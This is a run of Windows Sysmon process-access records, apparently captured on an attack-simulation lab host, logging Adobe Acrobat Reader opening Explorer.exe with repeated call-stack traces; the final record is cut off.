DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3965a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3965a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3965a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.319{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39390|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.319{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39390|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.319{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39390|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.319{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39390|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.317{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.317{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.317{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6 10341000x800000000000000046610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.317{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.315{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.315{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.315{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6 10341000x800000000000000046606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.315{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.314{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.313{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+392f6|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader 